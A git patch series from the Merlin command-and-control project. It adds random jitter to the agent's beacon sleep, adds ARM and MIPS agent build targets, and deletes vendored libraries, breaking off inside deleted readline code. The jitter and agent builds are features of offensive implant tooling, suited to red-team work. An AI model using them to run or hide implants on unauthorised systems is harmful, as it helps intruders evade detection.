From 9c1252339dc7cbbc87845fcc408b35680ecb9697 Mon Sep 17 00:00:00 2001 From: ahhh Date: Thu, 21 Dec 2017 11:16:18 -0800 Subject: [PATCH 01/60] adding a time skew to the beacon intervals --- cmd/merlinagent/main.go | 12 +++++++++--- cmd/merlinserver/main.go | 1 - 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 0229871a..5a723070 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -32,11 +32,11 @@ import ( "time" "github.com/fatih/color" - "github.com/satori/go.uuid" "golang.org/x/net/http2" "github.com/ne0nd0g/merlin/pkg/agent" "github.com/ne0nd0g/merlin/pkg/messages" + "github.com/satori/go.uuid" ) // GLOBAL VARIABLES @@ -47,6 +47,7 @@ var mRun = true var hostUUID = uuid.NewV4() var url = "https://127.0.0.1:443/" var h2Client = getH2WebClient() +var waitSkew int64 = 30000 var waitTime = 30000 * time.Millisecond var agentShell = "" var paddingMax = 4096 @@ -67,9 +68,12 @@ const ( func main() { + rand.Seed(time.Now().Unix()) + flag.BoolVar(&verbose, "v", false, "Enable verbose output") flag.BoolVar(&debug, "debug", false, "Enable debug output") flag.StringVar(&url, "url", url, "Full URL for agent to connect to") + flag.Int64Var(&waitSkew, "skew", 3000, "varriable skew added to each agent sleep") flag.DurationVar(&waitTime, "sleep", 30000*time.Millisecond, "Time for agent to sleep") flag.Usage = usage flag.Parse() @@ -94,10 +98,12 @@ func main() { if failedCheckin >= maxRetry { os.Exit(1) } + timeSkew := time.Duration(rand.Int63n(waitSkew)) * time.Millisecond + totalWaitTime := waitTime + timeSkew if verbose { - color.Yellow("[-]Sleeping for %s at %s", waitTime.String(), time.Now()) + color.Yellow("[-]Sleeping for %s at %s", totalWaitTime.String(), time.Now()) } - time.Sleep(waitTime) + time.Sleep(totalWaitTime) } } diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index dea71bad..d5e262ac 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -38,7 +38,6 @@ import ( "github.com/chzyer/readline" "github.com/fatih/color" "github.com/olekukonko/tablewriter" - "github.com/satori/go.uuid" // Merlin "github.com/ne0nd0g/merlin/pkg" From 9912e2c36c3753129b5ec71bd684ca3738245923 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Thu, 21 Dec 2017 11:19:16 -0800 Subject: [PATCH 02/60] Update main.go --- cmd/merlinserver/main.go | 1 + 1 file changed, 1 insertion(+) diff --git a/cmd/merlinserver/main.go b/cmd/merlinserver/main.go index d5e262ac..dea71bad 100644 --- a/cmd/merlinserver/main.go +++ b/cmd/merlinserver/main.go @@ -38,6 +38,7 @@ import ( "github.com/chzyer/readline" "github.com/fatih/color" "github.com/olekukonko/tablewriter" + "github.com/satori/go.uuid" // Merlin "github.com/ne0nd0g/merlin/pkg" From a691fe83f9998eb175e62d9c8f7a2726b4d83489 Mon Sep 17 00:00:00 2001 From: ahhh Date: Thu, 21 Dec 2017 14:24:02 -0800 Subject: [PATCH 03/60] minor fixes as requested by Ne0nd0g --- README.MD | 2 ++ cmd/merlinagent/main.go | 6 +++--- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/README.MD b/README.MD index 02bd16c8..34a10349 100644 --- a/README.MD +++ b/README.MD @@ -133,6 +133,8 @@ Run Merlin Agent as script: `go run cmd/merlinagent/main.go` Enable debug output -sleep duration Time for agent to sleep (default 10s) + -skew int + Variable time skew for agent to sleep -url string Full URL for agent to connect to (default "https://127.0.0.1:443") -v Enable verbose output diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 5a723070..6836bad9 100644 --- 
a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -68,16 +68,16 @@ const ( func main() { - rand.Seed(time.Now().Unix()) - flag.BoolVar(&verbose, "v", false, "Enable verbose output") flag.BoolVar(&debug, "debug", false, "Enable debug output") flag.StringVar(&url, "url", url, "Full URL for agent to connect to") - flag.Int64Var(&waitSkew, "skew", 3000, "varriable skew added to each agent sleep") + flag.Int64Var(&waitSkew, "skew", 3000, "Variable time skew for agent to sleep") flag.DurationVar(&waitTime, "sleep", 30000*time.Millisecond, "Time for agent to sleep") flag.Usage = usage flag.Parse() + rand.Seed(time.Now().UTC().UnixNano()) + if verbose { color.Yellow("[-]Agent version: %s", version) color.Yellow("[-]Agent build: %s", build) From 7173fc442d48b9abd13b508cad67827e794ee4e4 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Thu, 21 Dec 2017 17:19:29 -0800 Subject: [PATCH 04/60] Update main.go --- cmd/merlinagent/main.go | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index 6836bad9..ecf53d6b 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -33,10 +33,11 @@ import ( "github.com/fatih/color" "golang.org/x/net/http2" - + "github.com/satori/go.uuid" + "github.com/ne0nd0g/merlin/pkg/agent" "github.com/ne0nd0g/merlin/pkg/messages" - "github.com/satori/go.uuid" + ) // GLOBAL VARIABLES From c51b7c848e1a79c02f0b9956680ffec9df92c19b Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Thu, 21 Dec 2017 17:20:37 -0800 Subject: [PATCH 05/60] Update main.go --- cmd/merlinagent/main.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cmd/merlinagent/main.go b/cmd/merlinagent/main.go index ecf53d6b..7c686663 100644 --- a/cmd/merlinagent/main.go +++ b/cmd/merlinagent/main.go @@ -32,8 +32,8 @@ import ( "time" "github.com/fatih/color" - "golang.org/x/net/http2" "github.com/satori/go.uuid" + "golang.org/x/net/http2" "github.com/ne0nd0g/merlin/pkg/agent" "github.com/ne0nd0g/merlin/pkg/messages" From ff7a04d8d18e2a61afd7adbe619e57e48eace25a Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Thu, 21 Dec 2017 20:49:01 -0500 Subject: [PATCH 06/60] Removed vendor folder and added mips & arm targets --- .gitignore | 4 ++++ Makefile | 16 ++++++++++++++++ 2 files changed, 20 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 00000000..8d624778 --- /dev/null +++ b/.gitignore @@ -0,0 +1,4 @@ +.DS_STORE +data/.DS_Store +data/x509/server.crt +data/x509/server.key diff --git a/Makefile b/Makefile index ff1596e0..54b77d90 100644 --- a/Makefile +++ b/Makefile @@ -15,6 +15,8 @@ F=README.MD LICENSE data/README.MD data/agents/README.MD data/db/ data/log/READM F2=LICENSE W=Windows-x64 L=Linux-x64 +A=Linux-arm +M=Linux-mips D=Darwin-x64 # Make Directory to store executables @@ -31,6 +33,12 @@ windows: server-windows agent-windows # Compile Linux binaries linux: server-linux agent-linux +# Compile Arm binaries +arm: agent-arm + +# Compile mips binaries +mips: agent-mips + # Compile Darwin binaries darwin: server-darwin agent-darwin @@ -46,6 +54,14 @@ agent-windows: server-linux: export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MSERVER}-${L} cmd/merlinserver/main.go +# Compile Agent - Linux mips +agent-mips: + export GOOS=linux;export GOARCH=mips;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${M} cmd/merlinagent/main.go + +# Compile Agent - Linux arm +agent-arm: + export GOOS=linux;export GOARCH=arm;export GOARM=7;go build ${LDFLAGS} -o 
${DIR}/${MAGENT}-${A} cmd/merlinagent/main.go + # Compile Agent - Linux x64 agent-linux: export GOOS=linux;export GOARCH=amd64;go build ${LDFLAGS} -o ${DIR}/${MAGENT}-${L} cmd/merlinagent/main.go From 639b470cae146a816ce8cfd4cf8e86f4a55c98d3 Mon Sep 17 00:00:00 2001 From: Joel Braun Date: Thu, 21 Dec 2017 20:50:43 -0500 Subject: [PATCH 07/60] really deleted the vendor files --- .../github.com/chzyer/readline/CHANGELOG.md | 58 - vendor/github.com/chzyer/readline/LICENSE | 22 - vendor/github.com/chzyer/readline/README.md | 114 - .../chzyer/readline/ansi_windows.go | 246 -- vendor/github.com/chzyer/readline/complete.go | 283 -- .../chzyer/readline/complete_helper.go | 165 - .../chzyer/readline/complete_segment.go | 82 - vendor/github.com/chzyer/readline/history.go | 312 -- .../github.com/chzyer/readline/operation.go | 504 --- vendor/github.com/chzyer/readline/password.go | 32 - .../chzyer/readline/rawreader_windows.go | 125 - vendor/github.com/chzyer/readline/readline.go | 288 -- vendor/github.com/chzyer/readline/remote.go | 474 --- vendor/github.com/chzyer/readline/runebuf.go | 572 ---- vendor/github.com/chzyer/readline/runes.go | 223 -- vendor/github.com/chzyer/readline/search.go | 164 - vendor/github.com/chzyer/readline/std.go | 133 - .../github.com/chzyer/readline/std_windows.go | 9 - vendor/github.com/chzyer/readline/term.go | 123 - vendor/github.com/chzyer/readline/term_bsd.go | 29 - .../github.com/chzyer/readline/term_linux.go | 33 - .../chzyer/readline/term_solaris.go | 32 - .../github.com/chzyer/readline/term_unix.go | 24 - .../chzyer/readline/term_windows.go | 171 - vendor/github.com/chzyer/readline/terminal.go | 232 -- vendor/github.com/chzyer/readline/utils.go | 276 -- .../github.com/chzyer/readline/utils_unix.go | 83 - .../chzyer/readline/utils_windows.go | 41 - vendor/github.com/chzyer/readline/vim.go | 174 - .../github.com/chzyer/readline/windows_api.go | 152 - vendor/github.com/fatih/color/LICENSE.md | 20 - vendor/github.com/fatih/color/README.md | 154 - vendor/github.com/fatih/color/color.go | 423 --- vendor/github.com/fatih/color/doc.go | 114 - .../olekukonko/tablewriter/LICENCE.md | 19 - .../olekukonko/tablewriter/README.md | 204 -- .../github.com/olekukonko/tablewriter/csv.go | 52 - .../olekukonko/tablewriter/table.go | 662 ---- .../olekukonko/tablewriter/test.csv | 4 - .../olekukonko/tablewriter/test_info.csv | 4 - .../github.com/olekukonko/tablewriter/util.go | 72 - .../github.com/olekukonko/tablewriter/wrap.go | 103 - vendor/github.com/satori/go.uuid/LICENSE | 20 - vendor/github.com/satori/go.uuid/README.md | 65 - vendor/github.com/satori/go.uuid/uuid.go | 481 --- vendor/golang.org/x/net/LICENSE | 27 - vendor/golang.org/x/net/PATENTS | 22 - vendor/golang.org/x/net/http2/Dockerfile | 51 - vendor/golang.org/x/net/http2/Makefile | 3 - vendor/golang.org/x/net/http2/README | 20 - vendor/golang.org/x/net/http2/ciphers.go | 641 ---- .../x/net/http2/client_conn_pool.go | 256 -- .../x/net/http2/configure_transport.go | 80 - vendor/golang.org/x/net/http2/databuffer.go | 146 - vendor/golang.org/x/net/http2/errors.go | 133 - vendor/golang.org/x/net/http2/flow.go | 50 - vendor/golang.org/x/net/http2/frame.go | 1579 --------- vendor/golang.org/x/net/http2/go16.go | 16 - vendor/golang.org/x/net/http2/go17.go | 106 - vendor/golang.org/x/net/http2/go17_not18.go | 36 - vendor/golang.org/x/net/http2/go18.go | 56 - vendor/golang.org/x/net/http2/go19.go | 16 - vendor/golang.org/x/net/http2/gotrack.go | 170 - vendor/golang.org/x/net/http2/headermap.go | 78 - 
vendor/golang.org/x/net/http2/http2.go | 391 --- vendor/golang.org/x/net/http2/not_go16.go | 21 - vendor/golang.org/x/net/http2/not_go17.go | 87 - vendor/golang.org/x/net/http2/not_go18.go | 29 - vendor/golang.org/x/net/http2/not_go19.go | 16 - vendor/golang.org/x/net/http2/pipe.go | 163 - vendor/golang.org/x/net/http2/server.go | 2857 ----------------- vendor/golang.org/x/net/http2/transport.go | 2134 ------------ vendor/golang.org/x/net/http2/write.go | 370 --- vendor/golang.org/x/net/http2/writesched.go | 242 -- .../x/net/http2/writesched_priority.go | 452 --- .../x/net/http2/writesched_random.go | 72 - vendor/vendor.json | 43 - 77 files changed, 17936 deletions(-) delete mode 100644 vendor/github.com/chzyer/readline/CHANGELOG.md delete mode 100644 vendor/github.com/chzyer/readline/LICENSE delete mode 100644 vendor/github.com/chzyer/readline/README.md delete mode 100644 vendor/github.com/chzyer/readline/ansi_windows.go delete mode 100644 vendor/github.com/chzyer/readline/complete.go delete mode 100644 vendor/github.com/chzyer/readline/complete_helper.go delete mode 100644 vendor/github.com/chzyer/readline/complete_segment.go delete mode 100644 vendor/github.com/chzyer/readline/history.go delete mode 100644 vendor/github.com/chzyer/readline/operation.go delete mode 100644 vendor/github.com/chzyer/readline/password.go delete mode 100644 vendor/github.com/chzyer/readline/rawreader_windows.go delete mode 100644 vendor/github.com/chzyer/readline/readline.go delete mode 100644 vendor/github.com/chzyer/readline/remote.go delete mode 100644 vendor/github.com/chzyer/readline/runebuf.go delete mode 100644 vendor/github.com/chzyer/readline/runes.go delete mode 100644 vendor/github.com/chzyer/readline/search.go delete mode 100644 vendor/github.com/chzyer/readline/std.go delete mode 100644 vendor/github.com/chzyer/readline/std_windows.go delete mode 100644 vendor/github.com/chzyer/readline/term.go delete mode 100644 vendor/github.com/chzyer/readline/term_bsd.go delete mode 100644 vendor/github.com/chzyer/readline/term_linux.go delete mode 100644 vendor/github.com/chzyer/readline/term_solaris.go delete mode 100644 vendor/github.com/chzyer/readline/term_unix.go delete mode 100644 vendor/github.com/chzyer/readline/term_windows.go delete mode 100644 vendor/github.com/chzyer/readline/terminal.go delete mode 100644 vendor/github.com/chzyer/readline/utils.go delete mode 100644 vendor/github.com/chzyer/readline/utils_unix.go delete mode 100644 vendor/github.com/chzyer/readline/utils_windows.go delete mode 100644 vendor/github.com/chzyer/readline/vim.go delete mode 100644 vendor/github.com/chzyer/readline/windows_api.go delete mode 100644 vendor/github.com/fatih/color/LICENSE.md delete mode 100644 vendor/github.com/fatih/color/README.md delete mode 100644 vendor/github.com/fatih/color/color.go delete mode 100644 vendor/github.com/fatih/color/doc.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/LICENCE.md delete mode 100644 vendor/github.com/olekukonko/tablewriter/README.md delete mode 100644 vendor/github.com/olekukonko/tablewriter/csv.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/table.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/test.csv delete mode 100644 vendor/github.com/olekukonko/tablewriter/test_info.csv delete mode 100644 vendor/github.com/olekukonko/tablewriter/util.go delete mode 100644 vendor/github.com/olekukonko/tablewriter/wrap.go delete mode 100644 vendor/github.com/satori/go.uuid/LICENSE delete mode 100644 
vendor/github.com/satori/go.uuid/README.md delete mode 100644 vendor/github.com/satori/go.uuid/uuid.go delete mode 100644 vendor/golang.org/x/net/LICENSE delete mode 100644 vendor/golang.org/x/net/PATENTS delete mode 100644 vendor/golang.org/x/net/http2/Dockerfile delete mode 100644 vendor/golang.org/x/net/http2/Makefile delete mode 100644 vendor/golang.org/x/net/http2/README delete mode 100644 vendor/golang.org/x/net/http2/ciphers.go delete mode 100644 vendor/golang.org/x/net/http2/client_conn_pool.go delete mode 100644 vendor/golang.org/x/net/http2/configure_transport.go delete mode 100644 vendor/golang.org/x/net/http2/databuffer.go delete mode 100644 vendor/golang.org/x/net/http2/errors.go delete mode 100644 vendor/golang.org/x/net/http2/flow.go delete mode 100644 vendor/golang.org/x/net/http2/frame.go delete mode 100644 vendor/golang.org/x/net/http2/go16.go delete mode 100644 vendor/golang.org/x/net/http2/go17.go delete mode 100644 vendor/golang.org/x/net/http2/go17_not18.go delete mode 100644 vendor/golang.org/x/net/http2/go18.go delete mode 100644 vendor/golang.org/x/net/http2/go19.go delete mode 100644 vendor/golang.org/x/net/http2/gotrack.go delete mode 100644 vendor/golang.org/x/net/http2/headermap.go delete mode 100644 vendor/golang.org/x/net/http2/http2.go delete mode 100644 vendor/golang.org/x/net/http2/not_go16.go delete mode 100644 vendor/golang.org/x/net/http2/not_go17.go delete mode 100644 vendor/golang.org/x/net/http2/not_go18.go delete mode 100644 vendor/golang.org/x/net/http2/not_go19.go delete mode 100644 vendor/golang.org/x/net/http2/pipe.go delete mode 100644 vendor/golang.org/x/net/http2/server.go delete mode 100644 vendor/golang.org/x/net/http2/transport.go delete mode 100644 vendor/golang.org/x/net/http2/write.go delete mode 100644 vendor/golang.org/x/net/http2/writesched.go delete mode 100644 vendor/golang.org/x/net/http2/writesched_priority.go delete mode 100644 vendor/golang.org/x/net/http2/writesched_random.go delete mode 100644 vendor/vendor.json diff --git a/vendor/github.com/chzyer/readline/CHANGELOG.md b/vendor/github.com/chzyer/readline/CHANGELOG.md deleted file mode 100644 index 5c1811a7..00000000 --- a/vendor/github.com/chzyer/readline/CHANGELOG.md +++ /dev/null @@ -1,58 +0,0 @@ -# ChangeLog - -### 1.4 - 2016-07-25 - -* [#60][60] Support dynamic autocompletion -* Fix ANSI parser on Windows -* Fix wrong column width in complete mode on Windows -* Remove dependent package "golang.org/x/crypto/ssh/terminal" - -### 1.3 - 2016-05-09 - -* [#38][38] add SetChildren for prefix completer interface -* [#42][42] improve multiple lines compatibility -* [#43][43] remove sub-package(runes) for gopkg compatiblity -* [#46][46] Auto complete with space prefixed line -* [#48][48] support suspend process (ctrl+Z) -* [#49][49] fix bug that check equals with previous command -* [#53][53] Fix bug which causes integer divide by zero panicking when input buffer is empty - -### 1.2 - 2016-03-05 - -* Add a demo for checking password strength [example/readline-pass-strength](https://github.com/chzyer/readline/blob/master/example/readline-pass-strength/readline-pass-strength.go), , written by [@sahib](https://github.com/sahib) -* [#23][23], support stdin remapping -* [#27][27], add a `UniqueEditLine` to `Config`, which will erase the editing line after user submited it, usually use in IM. 
-* Add a demo for multiline [example/readline-multiline](https://github.com/chzyer/readline/blob/master/example/readline-multiline/readline-multiline.go) which can submit one SQL by multiple lines. -* Supports performs even stdin/stdout is not a tty. -* Add a new simple apis for single instance, check by [here](https://github.com/chzyer/readline/blob/master/std.go). It need to save history manually if using this api. -* [#28][28], fixes the history is not working as expected. -* [#33][33], vim mode now support `c`, `d`, `x (delete character)`, `r (replace character)` - -### 1.1 - 2015-11-20 - -* [#12][12] Add support for key ``/``/`` -* Only enter raw mode as needed (calling `Readline()`), program will receive signal(e.g. Ctrl+C) if not interact with `readline`. -* Bugs fixed for `PrefixCompleter` -* Press `Ctrl+D` in empty line will cause `io.EOF` in error, Press `Ctrl+C` in anytime will cause `ErrInterrupt` instead of `io.EOF`, this will privodes a shell-like user experience. -* Customable Interrupt/EOF prompt in `Config` -* [#17][17] Change atomic package to use 32bit function to let it runnable on arm 32bit devices -* Provides a new password user experience(`readline.ReadPasswordEx()`). - -### 1.0 - 2015-10-14 - -* Initial public release. - -[12]: https://github.com/chzyer/readline/pull/12 -[17]: https://github.com/chzyer/readline/pull/17 -[23]: https://github.com/chzyer/readline/pull/23 -[27]: https://github.com/chzyer/readline/pull/27 -[28]: https://github.com/chzyer/readline/pull/28 -[33]: https://github.com/chzyer/readline/pull/33 -[38]: https://github.com/chzyer/readline/pull/38 -[42]: https://github.com/chzyer/readline/pull/42 -[43]: https://github.com/chzyer/readline/pull/43 -[46]: https://github.com/chzyer/readline/pull/46 -[48]: https://github.com/chzyer/readline/pull/48 -[49]: https://github.com/chzyer/readline/pull/49 -[53]: https://github.com/chzyer/readline/pull/53 -[60]: https://github.com/chzyer/readline/pull/60 diff --git a/vendor/github.com/chzyer/readline/LICENSE b/vendor/github.com/chzyer/readline/LICENSE deleted file mode 100644 index c9afab3d..00000000 --- a/vendor/github.com/chzyer/readline/LICENSE +++ /dev/null @@ -1,22 +0,0 @@ -The MIT License (MIT) - -Copyright (c) 2015 Chzyer - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. 
- diff --git a/vendor/github.com/chzyer/readline/README.md b/vendor/github.com/chzyer/readline/README.md deleted file mode 100644 index fab974b7..00000000 --- a/vendor/github.com/chzyer/readline/README.md +++ /dev/null @@ -1,114 +0,0 @@ -[![Build Status](https://travis-ci.org/chzyer/readline.svg?branch=master)](https://travis-ci.org/chzyer/readline) -[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE.md) -[![Version](https://img.shields.io/github/tag/chzyer/readline.svg)](https://github.com/chzyer/readline/releases) -[![GoDoc](https://godoc.org/github.com/chzyer/readline?status.svg)](https://godoc.org/github.com/chzyer/readline) -[![OpenCollective](https://opencollective.com/readline/badge/backers.svg)](#backers) -[![OpenCollective](https://opencollective.com/readline/badge/sponsors.svg)](#sponsors) - -


- -A powerful readline library in `Linux` `macOS` `Windows` `Solaris` - -## Guide - -* [Demo](example/readline-demo/readline-demo.go) -* [Shortcut](doc/shortcut.md) - -## Repos using readline - -[![cockroachdb](https://img.shields.io/github/stars/cockroachdb/cockroach.svg?label=cockroachdb/cockroach)](https://github.com/cockroachdb/cockroach) -[![robertkrimen/otto](https://img.shields.io/github/stars/robertkrimen/otto.svg?label=robertkrimen/otto)](https://github.com/robertkrimen/otto) -[![empire](https://img.shields.io/github/stars/remind101/empire.svg?label=remind101/empire)](https://github.com/remind101/empire) -[![mehrdadrad/mylg](https://img.shields.io/github/stars/mehrdadrad/mylg.svg?label=mehrdadrad/mylg)](https://github.com/mehrdadrad/mylg) -[![knq/usql](https://img.shields.io/github/stars/knq/usql.svg?label=knq/usql)](https://github.com/knq/usql) -[![youtube/doorman](https://img.shields.io/github/stars/youtube/doorman.svg?label=youtube/doorman)](https://github.com/youtube/doorman) -[![bom-d-van/harp](https://img.shields.io/github/stars/bom-d-van/harp.svg?label=bom-d-van/harp)](https://github.com/bom-d-van/harp) -[![abiosoft/ishell](https://img.shields.io/github/stars/abiosoft/ishell.svg?label=abiosoft/ishell)](https://github.com/abiosoft/ishell) -[![Netflix/hal-9001](https://img.shields.io/github/stars/Netflix/hal-9001.svg?label=Netflix/hal-9001)](https://github.com/Netflix/hal-9001) -[![docker/go-p9p](https://img.shields.io/github/stars/docker/go-p9p.svg?label=docker/go-p9p)](https://github.com/docker/go-p9p) - - -## Feedback - -If you have any questions, please submit a github issue and any pull requests is welcomed :) - -* [https://twitter.com/chzyer](https://twitter.com/chzyer) -* [http://weibo.com/2145262190](http://weibo.com/2145262190) - - -## Backers - -Love Readline? Help me keep it alive by donating funds to cover project expenses!
-[[Become a backer](https://opencollective.com/readline#backer)] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -## Sponsors - -Become a sponsor and get your logo here on our Github page. [[Become a sponsor](https://opencollective.com/readline#sponsor)] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/vendor/github.com/chzyer/readline/ansi_windows.go b/vendor/github.com/chzyer/readline/ansi_windows.go deleted file mode 100644 index da106b57..00000000 --- a/vendor/github.com/chzyer/readline/ansi_windows.go +++ /dev/null @@ -1,246 +0,0 @@ -// +build windows - -package readline - -import ( - "bufio" - "io" - "strconv" - "strings" - "sync" - "unicode/utf8" - "unsafe" -) - -const ( - _ = uint16(0) - COLOR_FBLUE = 0x0001 - COLOR_FGREEN = 0x0002 - COLOR_FRED = 0x0004 - COLOR_FINTENSITY = 0x0008 - - COLOR_BBLUE = 0x0010 - COLOR_BGREEN = 0x0020 - COLOR_BRED = 0x0040 - COLOR_BINTENSITY = 0x0080 - - COMMON_LVB_UNDERSCORE = 0x8000 -) - -var ColorTableFg = []word{ - 0, // 30: Black - COLOR_FRED, // 31: Red - COLOR_FGREEN, // 32: Green - COLOR_FRED | COLOR_FGREEN, // 33: Yellow - COLOR_FBLUE, // 34: Blue - COLOR_FRED | COLOR_FBLUE, // 35: Magenta - COLOR_FGREEN | COLOR_FBLUE, // 36: Cyan - COLOR_FRED | COLOR_FBLUE | COLOR_FGREEN, // 37: White -} - -var ColorTableBg = []word{ - 0, // 40: Black - COLOR_BRED, // 41: Red - COLOR_BGREEN, // 42: Green - COLOR_BRED | COLOR_BGREEN, // 43: Yellow - COLOR_BBLUE, // 44: Blue - COLOR_BRED | COLOR_BBLUE, // 45: Magenta - COLOR_BGREEN | COLOR_BBLUE, // 46: Cyan - COLOR_BRED | COLOR_BBLUE | COLOR_BGREEN, // 47: White -} - -type ANSIWriter struct { - target io.Writer - wg sync.WaitGroup - ctx *ANSIWriterCtx - sync.Mutex -} - -func NewANSIWriter(w io.Writer) *ANSIWriter { - a := &ANSIWriter{ - target: w, - ctx: NewANSIWriterCtx(w), - } - return a -} - -func (a *ANSIWriter) Close() error { - a.wg.Wait() - return nil -} - -type ANSIWriterCtx struct { - isEsc bool - isEscSeq bool - arg []string - target *bufio.Writer - wantFlush bool -} - -func NewANSIWriterCtx(target io.Writer) *ANSIWriterCtx { - return &ANSIWriterCtx{ - target: bufio.NewWriter(target), - } -} - -func (a *ANSIWriterCtx) Flush() { - a.target.Flush() -} - -func (a *ANSIWriterCtx) process(r rune) bool { - if a.wantFlush { - if r == 0 || r == CharEsc { - a.wantFlush = false - a.target.Flush() - } - } - if a.isEscSeq { - a.isEscSeq = a.ioloopEscSeq(a.target, r, &a.arg) - return true - } - - switch r { - case CharEsc: - a.isEsc = true - case '[': - if a.isEsc { - a.arg = nil - a.isEscSeq = true - a.isEsc = false - break - } - fallthrough - default: - a.target.WriteRune(r) - a.wantFlush = true - } - return true -} - -func (a *ANSIWriterCtx) ioloopEscSeq(w *bufio.Writer, r rune, argptr *[]string) bool { - arg := *argptr - var err error - - if r >= 'A' && r <= 'D' { - count := short(GetInt(arg, 1)) - info, err := GetConsoleScreenBufferInfo() - if err != nil { - return false - } - switch r { - case 'A': // up - info.dwCursorPosition.y -= count - case 'B': // down - info.dwCursorPosition.y += count - case 'C': // right - info.dwCursorPosition.x += count - case 'D': // left - info.dwCursorPosition.x -= count - } - SetConsoleCursorPosition(&info.dwCursorPosition) - return false - } - - switch r { - case 'J': - killLines() - case 'K': - eraseLine() - case 'm': - color := word(0) - for _, item := range arg { - var c int - c, err = strconv.Atoi(item) - if err != nil { - w.WriteString("[" + strings.Join(arg, ";") + "m") - break - } - if c >= 30 && c < 40 { - color ^= 
COLOR_FINTENSITY - color |= ColorTableFg[c-30] - } else if c >= 40 && c < 50 { - color ^= COLOR_BINTENSITY - color |= ColorTableBg[c-40] - } else if c == 4 { - color |= COMMON_LVB_UNDERSCORE | ColorTableFg[7] - } else { // unknown code treat as reset - color = ColorTableFg[7] - } - } - if err != nil { - break - } - kernel.SetConsoleTextAttribute(stdout, uintptr(color)) - case '\007': // set title - case ';': - if len(arg) == 0 || arg[len(arg)-1] != "" { - arg = append(arg, "") - *argptr = arg - } - return true - default: - if len(arg) == 0 { - arg = append(arg, "") - } - arg[len(arg)-1] += string(r) - *argptr = arg - return true - } - *argptr = nil - return false -} - -func (a *ANSIWriter) Write(b []byte) (int, error) { - a.Lock() - defer a.Unlock() - - off := 0 - for len(b) > off { - r, size := utf8.DecodeRune(b[off:]) - if size == 0 { - return off, io.ErrShortWrite - } - off += size - a.ctx.process(r) - } - a.ctx.Flush() - return off, nil -} - -func killLines() error { - sbi, err := GetConsoleScreenBufferInfo() - if err != nil { - return err - } - - size := (sbi.dwCursorPosition.y - sbi.dwSize.y) * sbi.dwSize.x - size += sbi.dwCursorPosition.x - - var written int - kernel.FillConsoleOutputAttribute(stdout, uintptr(ColorTableFg[7]), - uintptr(size), - sbi.dwCursorPosition.ptr(), - uintptr(unsafe.Pointer(&written)), - ) - return kernel.FillConsoleOutputCharacterW(stdout, uintptr(' '), - uintptr(size), - sbi.dwCursorPosition.ptr(), - uintptr(unsafe.Pointer(&written)), - ) -} - -func eraseLine() error { - sbi, err := GetConsoleScreenBufferInfo() - if err != nil { - return err - } - - size := sbi.dwSize.x - sbi.dwCursorPosition.x = 0 - var written int - return kernel.FillConsoleOutputCharacterW(stdout, uintptr(' '), - uintptr(size), - sbi.dwCursorPosition.ptr(), - uintptr(unsafe.Pointer(&written)), - ) -} diff --git a/vendor/github.com/chzyer/readline/complete.go b/vendor/github.com/chzyer/readline/complete.go deleted file mode 100644 index 349fc3d2..00000000 --- a/vendor/github.com/chzyer/readline/complete.go +++ /dev/null @@ -1,283 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "fmt" - "io" -) - -type AutoCompleter interface { - // Readline will pass the whole line and current offset to it - // Completer need to pass all the candidates, and how long they shared the same characters in line - // Example: - // [go, git, git-shell, grep] - // Do("g", 1) => ["o", "it", "it-shell", "rep"], 1 - // Do("gi", 2) => ["t", "t-shell"], 2 - // Do("git", 3) => ["", "-shell"], 3 - Do(line []rune, pos int) (newLine [][]rune, length int) -} - -type TabCompleter struct{} - -func (t *TabCompleter) Do([]rune, int) ([][]rune, int) { - return [][]rune{[]rune("\t")}, 0 -} - -type opCompleter struct { - w io.Writer - op *Operation - width int - - inCompleteMode bool - inSelectMode bool - candidate [][]rune - candidateSource []rune - candidateOff int - candidateChoise int - candidateColNum int -} - -func newOpCompleter(w io.Writer, op *Operation, width int) *opCompleter { - return &opCompleter{ - w: w, - op: op, - width: width, - } -} - -func (o *opCompleter) doSelect() { - if len(o.candidate) == 1 { - o.op.buf.WriteRunes(o.candidate[0]) - o.ExitCompleteMode(false) - return - 